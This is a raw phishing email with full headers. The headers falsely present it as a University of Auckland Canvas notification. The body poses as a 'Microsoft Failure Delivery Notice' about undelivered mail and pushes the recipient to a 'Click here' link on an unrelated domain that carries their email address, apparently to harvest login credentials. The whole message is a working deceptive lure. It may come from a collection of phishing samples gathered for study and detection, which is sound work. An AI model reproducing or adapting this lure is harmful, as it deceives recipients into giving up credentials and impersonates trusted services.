From - Fri Aug 25 21:23:53 2023
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
X-Mozilla-Keys:                                                                                 
Received: by 2002:a05:7208:214c:b0:6f:7a8:aa98 with SMTP id x12csp1506202rbx;
        Sat, 12 Aug 2023 01:54:10 -0700 (PDT)
Received: from b235-185.smtp-out.ap-southeast-2.amazonses.com (b235-185.smtp-out.ap-southeast-2.amazonses.com. [69.169.235.185])
        by mx.google.com with ESMTPS id m27-20020a63711b000000b0055b635d97adsi4600232pgc.619.2023.08.12.01.54.09
        for <hche407@aucklanduni.ac.nz>
        (version=TLS1_2 cipher=ECDHE-ECDSA-AES128-GCM-SHA256 bits=128/128);
        Sat, 12 Aug 2023 01:54:10 -0700 (PDT)
From: University of Auckland - Canvas <notifications@instructure.com>
To: "hche407@aucklanduni.ac.nz" <hche407@aucklanduni.ac.nz>
Subject: Recent Canvas notifications
Thread-Topic: Recent Canvas notifications
Thread-Index: AQLS0ggvZ+BvpfjK8XSkuTD9HOZLfA==
X-MS-Exchange-MessageSentRepresentingType: 1
Date: Sat, 12 Aug 2023 20:54:09 +1200
Message-ID:
	<01080189e8f3f38e-03970566-606f-42e8-b9c9-c7b6e3e419cc-000000@ap-southeast-2.amazonses.com>
Keywords: e.veritas:Legitimate
Reply-To:
	"reply+e7e30e5bb9275490-6199~248364651-1691830441@notifications.canvaslms.com"
	<reply+e7e30e5bb9275490-6199~248364651-1691830441@notifications.canvaslms.com>
Content-Language: en-US
X-MS-Has-Attach:
X-MS-TNEF-Correlator:
X-MS-Exchange-Organization-RecordReviewCfmType: 0
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="===============1969536252=="

--===============1969536252==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

  Microsoft Failure Delivery Notice.
  User: jose@monkey.org =

 3 pending sent messages couldn't be delivered =

 =

 Action Required.    =

How to Fix It. =

Click here to view undelivered sent email. =

 Created Date: 01. 12. 2022 =

 =

 =

 The information contained in or attached to this communication is intended=
 solely for the use of the individual or entity to whom it is addressed and=
 others authorised to receive it. It may contain confidential or legally pr=
ivileged information. If you are not the intended recipient you are hereby =
notified that any disclosure, copying, distribution or taking any action in=
 reliance on the contents of this information is strictly prohibited and ma=
y be unlawful. If you have received this communication in error, please not=
ify me immediately by responding to this email and then delete it from your=
 system. We are neither liable for the proper and complete transmission of =
the information contained in this communication nor for any delay in its re=
ceipt.    =20
--===============1969536252==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<HTML><head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Diso-8859-1"/></head><BODY><DIV id=3D:470 class=3D"Ar Au Ao" style=3D"DIS=
PLAY: block">
<DIV spellcheck=3Dfalse role=3Dtextbox tabIndex=3D1 aria-label=3D"Message B=
ody" aria-multiline=3Dtrue id=3D:46w class=3D"Am Al editable LW-avf tS-tW t=
S-tY" hideFocus contentEditable=3Dtrue style=3D"DIRECTION: ltr; MIN-HEIGHT:=
 355px" g_editable=3D"true">
<P><STRONG>Microsoft Failure Delivery Notice.</STRONG></P>
<DIV>
<DIV style=3D"BORDER-LEFT-WIDTH: 0px; BORDER-RIGHT-WIDTH: 0px; VERTICAL-ALI=
GN: baseline; BORDER-BOTTOM-WIDTH: 0px; COLOR: rgb(32,31,30); PADDING-BOTTO=
M: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; PADDING-RIGHT: 0p=
x; BORDER-TOP-WIDTH: 0px">User:&nbsp;<STRONG>jose@monkey.org</STRONG></DIV>
<DIV style=3D"BORDER-LEFT-WIDTH: 0px; BORDER-RIGHT-WIDTH: 0px; VERTICAL-ALI=
GN: baseline; BORDER-BOTTOM-WIDTH: 0px; COLOR: rgb(32,31,30); PADDING-BOTTO=
M: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; PADDING-RIGHT: 0p=
x; BORDER-TOP-WIDTH: 0px"><BR></DIV>
<P style=3D"COLOR: rgb(32,31,30)">3 pending sent messages couldn't be deliv=
ered&nbsp;</P>
<DIV style=3D"BORDER-LEFT-WIDTH: 0px; BORDER-RIGHT-WIDTH: 0px; VERTICAL-ALI=
GN: baseline; BORDER-BOTTOM-WIDTH: 0px; COLOR: rgb(32,31,30); PADDING-BOTTO=
M: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; PADDING-RIGHT: 0p=
x; BORDER-TOP-WIDTH: 0px"><BR></DIV>
<DIV style=3D"BORDER-LEFT-WIDTH: 0px; BORDER-RIGHT-WIDTH: 0px; VERTICAL-ALI=
GN: baseline; BORDER-BOTTOM-WIDTH: 0px; COLOR: rgb(32,31,30); PADDING-BOTTO=
M: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; PADDING-RIGHT: 0p=
x; BORDER-TOP-WIDTH: 0px">Action Required.&nbsp; &nbsp;&nbsp;<BR>How to Fix=
 It.
<DIV style=3D"BORDER-LEFT-WIDTH: 0px; BORDER-RIGHT-WIDTH: 0px; VERTICAL-ALI=
GN: baseline; BORDER-BOTTOM-WIDTH: 0px; PADDING-BOTTOM: 0px; PADDING-TOP: 0=
px; PADDING-LEFT: 0px; MARGIN: 0px; PADDING-RIGHT: 0px; BORDER-TOP-WIDTH: 0=
px"><BR><STRONG><SPAN style=3D"COLOR: rgb(0,0,255)"><A href=3D"https://tuwa=
.org.tw/%3C%3E/NewestUpdate/?email=3Djose@monkey.org" target=3D_blank data-=
saferedirecturl=3D"https://www.google.com/url?q=3Dhttps://joetradeco.com/%2=
53C%253E/Growth/?email%3D25&amp;source=3Dgmail&amp;ust=3D1642003348399000&a=
mp;usg=3DAOvVaw1wYDTjNo9lrH-JO9asK0O5">Click here</A></SPAN>&nbsp;</STRONG>=
to view undelivered sent email.</DIV>
<DIV style=3D"BORDER-LEFT-WIDTH: 0px; BORDER-RIGHT-WIDTH: 0px; VERTICAL-ALI=
GN: baseline; BORDER-BOTTOM-WIDTH: 0px; PADDING-BOTTOM: 0px; PADDING-TOP: 0=
px; PADDING-LEFT: 0px; MARGIN: 0px; PADDING-RIGHT: 0px; BORDER-TOP-WIDTH: 0=
px"><BR></DIV>
<DIV style=3D"BORDER-LEFT-WIDTH: 0px; BORDER-RIGHT-WIDTH: 0px; VERTICAL-ALI=
GN: baseline; BORDER-BOTTOM-WIDTH: 0px; PADDING-BOTTOM: 0px; PADDING-TOP: 0=
px; PADDING-LEFT: 0px; MARGIN: 0px; PADDING-RIGHT: 0px; BORDER-TOP-WIDTH: 0=
px">Created Date: 01. 12. 2022</DIV></DIV></DIV>
<DIV><BR></DIV>
<DIV><BR></DIV>
<DIV><BR></DIV>
<DIV><SPAN style=3D"LINE-HEIGHT: 18px"><FONT size=3D1><FONT color=3D#999999=
>The information contained in or attached to this communication is intended=
 solely for the use of the individual or entity to whom it is addressed and=
 others authorised to receive it. It may contain confidential or legally pr=
ivileged information. If you are not the intended recipient you are hereby =
notified that any disclosure, copying, distribution or taking any action in=
 reliance on the contents of this information is strictly prohibited and ma=
y be unlawful. If you have received this communication in error, please not=
ify me immediately by responding to this email and then delete it from your=
 system. We are neither liable for the proper and complete transmission of =
the information contained in this communication nor for any delay in its re=
ceipt.&nbsp;</FONT>&nbsp; &nbsp;&nbsp;</FONT></SPAN></DIV></DIV></DIV></BOD=
Y></HTML>
--===============1969536252==--
